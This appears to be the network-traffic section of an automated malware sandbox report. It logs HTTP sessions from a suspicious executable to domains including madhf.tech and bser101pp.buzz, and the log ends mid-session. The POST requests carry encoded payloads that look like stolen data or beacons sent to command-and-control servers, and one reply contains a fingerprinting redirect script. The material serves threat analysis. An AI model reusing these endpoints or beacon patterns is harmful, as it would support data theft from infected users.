                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549843194.76.119.60801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:16.520003080 CET370OUTGET /qx5d/?aX8p=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPprLjHaJYh8SQgKp2LTuI6fSpOh4h3JLSnOc8Ym74JECmGQ==&VF=6pChKdZP- HTTP/1.1
                                                            Host: www.cstrategy.online
                                                            Accept: */*
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Nov 27, 2024 15:33:17.889467955 CET542INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 27 Nov 2024 14:33:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 178
                                                            Connection: close
                                                            Location: https://www.cstrategy.online/qx5d/?aX8p=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPprLjHaJYh8SQgKp2LTuI6fSpOh4h3JLSnOc8Ym74JECmGQ==&VF=6pChKdZP-
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549861103.224.182.242801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:24.225250006 CET619OUTPOST /6ou6/ HTTP/1.1
                                                            Host: www.madhf.tech
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.madhf.tech
                                                            Content-Length: 205
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.madhf.tech/6ou6/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4d 79 41 43 68 48 6f 43 65 74 65 32 61 66 4b 56 76 2f 48 4a 42 49 4b 31 37 34 31 67 65 67 4c 48 2f 6f 76 38 79 71 39 2f 49 67 50 45 58 32 32 33 4e 53 30 34 50 58 50 54 4b 36 34 65 30 46 71 2f 36 78 55 78 57 64 54 42 39 57 37 6a 2f 4e 46 6c 32 4d 68 64 35 49 70 68 50 45 62 37 51 37 36 2f 4b 73 73 6b 45 57 41 4b 55 4f 78 4a 4c 50 64 67 75 67 44 77 74 44 4e 62 53 6e 71 43 6d 31 65 36 43 39 39 4a 66 78 6d 75 45 4c 4c 6d 5a 6f 79 4e 6e 64 67 46 53 6a 49 2f 2b 52 48 4b 43 47 4e 78 74 46 4e 6c 45 57 76 33 46 68 5a 31 57 4d 38 69 35 37 73 58 35 30 48 35 48 5a 49 3d
                                                            Data Ascii: aX8p=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFSjI/+RHKCGNxtFNlEWv3FhZ1WM8i57sX50H5HZI=
                                                            Nov 27, 2024 15:33:25.453655005 CET871INHTTP/1.1 200 OK
                                                            date: Wed, 27 Nov 2024 14:33:25 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732718005.4066806; expires=Sat, 25-Nov-2034 14:33:25 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-encoding: gzip
                                                            content-length: 576
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                            Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549869103.224.182.242801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:26.891403913 CET639OUTPOST /6ou6/ HTTP/1.1
                                                            Host: www.madhf.tech
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.madhf.tech
                                                            Content-Length: 225
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.madhf.tech/6ou6/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 56 6a 48 36 36 33 38 31 75 4a 2f 4e 67 50 45 63 57 32 49 44 79 30 76 50 58 44 78 4b 35 67 65 30 45 4b 2f 36 7a 4d 78 52 75 72 43 39 47 37 68 33 74 46 6a 37 73 68 64 35 49 70 68 50 41 7a 52 51 37 69 2f 4c 66 6b 6b 4c 53 55 4c 4c 2b 78 49 49 50 64 67 6c 41 44 30 74 44 4d 32 53 69 7a 66 6d 33 57 36 43 34 52 4a 66 6a 43 74 4f 4c 4c 6b 47 59 7a 6a 76 74 4a 70 55 79 67 2f 69 52 4f 77 66 32 4d 50 6f 7a 38 50 65 30 6e 66 57 42 31 4e 47 66 30 56 6f 4c 4e 2b 6a 58 58 4a 5a 4f 65 2b 51 75 34 44 4e 4f 4a 71 73 48 37 6e 46 6a 43 44 50 53 34 4f
                                                            Data Ascii: aX8p=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWB1NGf0VoLN+jXXJZOe+Qu4DNOJqsH7nFjCDPS4O
                                                            Nov 27, 2024 15:33:28.224009991 CET871INHTTP/1.1 200 OK
                                                            date: Wed, 27 Nov 2024 14:33:27 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732718007.5915704; expires=Sat, 25-Nov-2034 14:33:27 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-encoding: gzip
                                                            content-length: 576
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                            Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549876103.224.182.242801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:29.608752966 CET1656OUTPOST /6ou6/ HTTP/1.1
                                                            Host: www.madhf.tech
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.madhf.tech
                                                            Content-Length: 1241
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.madhf.tech/6ou6/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 54 37 48 6d 66 72 38 7a 4a 56 2f 4b 67 50 45 41 6d 32 7a 44 79 30 79 50 58 4c 31 4b 35 74 70 30 41 36 2f 37 53 73 78 51 66 72 43 75 6d 37 68 6f 64 46 69 32 4d 68 45 35 4c 52 74 50 45 76 52 51 37 69 2f 4c 5a 41 6b 50 47 41 4c 51 2b 78 4a 4c 50 63 68 75 67 44 49 74 41 38 49 53 6a 48 50 6d 45 4f 36 44 59 42 4a 61 52 61 74 4e 72 4c 69 48 59 7a 4e 76 74 56 32 55 79 73 4a 69 53 53 4b 66 30 4d 50 6f 33 41 57 61 32 72 72 42 41 34 72 4a 6f 31 32 2b 63 4a 50 6d 47 33 38 52 65 2b 43 5a 75 67 50 50 4a 52 58 6c 48 79 76 54 79 43 6f 47 69 64 79 2b 35 6e 38 4d 39 49 68 4e 46 32 73 74 4a 71 31 6c 53 45 56 75 37 2f 39 6f 48 71 53 57 44 77 73 4a 65 48 4c 75 35 46 4f 36 41 38 31 50 4e 62 32 5a 75 4a 4c 56 43 61 78 74 6d 62 46 50 6a 33 64 58 46 56 37 78 48 4a 4e 66 45 2f 57 71 33 48 6a 45 54 66 45 55 72 71 44 73 44 49 30 75 52 71 61 70 59 35 41 47 49 47 50 33 73 51 4c 34 30 48 52 42 [TRUNCATED]
                                                            Data Ascii: aX8p=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eT7Hmfr8zJV/KgPEAm2zDy0yPXL1K5tp0A6/7SsxQfrCum7hodFi2MhE5LRtPEvRQ7i/LZAkPGALQ+xJLPchugDItA8ISjHPmEO6DYBJaRatNrLiHYzNvtV2UysJiSSKf0MPo3AWa2rrBA4rJo12+cJPmG38Re+CZugPPJRXlHyvTyCoGidy+5n8M9IhNF2stJq1lSEVu7/9oHqSWDwsJeHLu5FO6A81PNb2ZuJLVCaxtmbFPj3dXFV7xHJNfE/Wq3HjETfEUrqDsDI0uRqapY5AGIGP3sQL40HRBNNsiZ6yhbpBX0Gx7uzC2izWsQWyH2SIHijcJ7ag2967fLnXPilx2oTd1NVCkytqTLiMe4tWrZpuwoccfLmvNkZsVjMYTPKciHLBEHfcp5vN//JUbQRJdpq6GzZDSb2fgS9mRp53lnmHxeIyfT2N3EcHUB6A5ZsTKFE5GztxZcUdHUv6x+FS9SBbzXjxC6zehweYTmpV08OPSiLms2Mr5BR3orIi/Z13XGi/UF1QgC321PFlldYFdsXQSM/URW4TeJjCb+uJ0u6VcqnjIBNnV5PdnxY7wdSWe/I2v3Y786sFIfPSIxF8EerMZb8RseUPsgRI8syQVHyAKwslV9sGPdHhqmK+J/6V0MHZW82UCCJXXOXbKqdcgewXrDkMKqKuTb7ODJJCs9y/Q6VA0wbLfyQDsIk8v/OJV55nqRDm+s+sNJZ2OGeIlaSWAiUOYw7I0+mWcoFTAZSxp1UkFeYAeL+rvzwadesWqNty31b/+LA+ApGxJGFa/Q/qfruWwP2IWf1uP1kkKz+02088asr9t7O7hYJcMltMW7DvEudc85k0Z0l+TYsS7iMF2sKQFKLttwlxrJqWiCOaM9t4GJ3lz2ogFIp49e3xbEpI8DvvdwNrpIkS4dydlQPn19ZpEEDDtlQCjC3IDapO/COS3LYqeS853yTj81waSnq [TRUNCATED]
                                                            Nov 27, 2024 15:33:31.010962963 CET871INHTTP/1.1 200 OK
                                                            date: Wed, 27 Nov 2024 14:33:30 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732718010.4137190; expires=Sat, 25-Nov-2034 14:33:30 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-encoding: gzip
                                                            content-length: 576
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                            Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549883103.224.182.242801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:32.288326979 CET364OUTGET /6ou6/?VF=6pChKdZP-&aX8p=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/UnDqMtKwbhA7qdtFmnjL5G+EcoCGS9edu4uK8ABvFKG4A== HTTP/1.1
                                                            Host: www.madhf.tech
                                                            Accept: */*
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Nov 27, 2024 15:33:33.623339891 CET1236INHTTP/1.1 200 OK
                                                            date: Wed, 27 Nov 2024 14:33:33 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732718013.5310437; expires=Sat, 25-Nov-2034 14:33:33 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-length: 1505
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f 75 36 2f 3f 56 46 3d 36 70 43 68 4b 64 5a 50 2d 26 61 58 38 70 3d 57 65 37 32 6b 32 55 38 52 71 79 48 4e 78 39 63 30 6c 67 72 63 4d 61 6a 50 2b 37 50 79 64 50 6e 43 61 75 30 35 4b 51 4d 55 6a 57 6d 71 37 33 49 7a 75 70 46 64 52 47 64 64 6e 6d 58 43 53 52 64 4d 55 72 6b 47 4b 64 51 30 41 48 59 38 6a 42 49 55 63 2f 74 2f 55 6e 44 71 4d 74 4b 77 62 68 41 37 71 64 74 46 6d 6e 6a 4c 35 47 2b 45 63 6f 43 47 53 39 65 64 75 34 75 4b 38 41 42 [TRUNCATED]
                                                            Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?VF=6pChKdZP-&aX8p=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/UnDqMtKwbhA7qdtFmnjL5G+EcoCGS9edu4uK8ABvFKG4A==&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ff
                                                            Nov 27, 2024 15:33:33.623589993 CET541INData Raw: 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36
                                                            Data Ascii: ffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?VF=6pChKdZP-&aX8p=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/UnDqMtKwbhA7qdtFmnjL5G+EcoCGS9edu4uK8ABvFKG4A==&fp=-3


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.549899172.67.158.106801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:39.168418884 CET631OUTPOST /v89f/ HTTP/1.1
                                                            Host: www.bser101pp.buzz
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.bser101pp.buzz
                                                            Content-Length: 205
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.bser101pp.buzz/v89f/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 51 61 45 52 37 58 6a 38 69 33 31 67 51 44 61 6a 45 7a 6b 68 38 53 48 68 59 45 59 68 2f 63 66 51 33 41 77 37 34 34 78 48 36 6a 65 7a 67 37 43 63 75 77 30 32 71 52 34 67 54 33 52 4e 6d 57 55 73 57 37 51 55 78 31 5a 45 32 59 6f 35 68 68 33 47 54 33 54 75 55 58 36 67 47 35 66 45 39 71 6d 59 48 7a 74 45 34 56 2b 64 48 34 6f 66 5a 71 69 5a 67 36 6e 7a 6f 44 2f 75 43 71 7a 4f 50 36 51 37 62 42 46 64 75 6b 68 55 4b 2b 64 57 4c 78 56 32 39 58 50 70 30 55 77 63 74 2f 32 61 7a 42 6d 78 5a 72 75 35 64 43 72 72 4a 61 38 7a 55 74 62 42 4a 78 70 39 2b 2f 62 57 2f 68 30 3d
                                                            Data Ascii: aX8p=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp0Uwct/2azBmxZru5dCrrJa8zUtbBJxp9+/bW/h0=
                                                            Nov 27, 2024 15:33:40.385756016 CET972INHTTP/1.1 404 Not Found
                                                            Date: Wed, 27 Nov 2024 14:33:40 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOIOa9kgfaxUv8pEIxqyFDjjddKR1Vz7IxkD4J7VYWV6RibOJpLPSvQr9wovgC9C3tP7%2BbPk1xAgYwyIK2inI1meDKB1ywH%2BQDA3tmfKsWfuBM6PMS4IvVapcu49VX5WJegGrlI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e92d5a9ba5a0cae-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1542&rtt_var=771&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.549906172.67.158.106801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:41.839597940 CET651OUTPOST /v89f/ HTTP/1.1
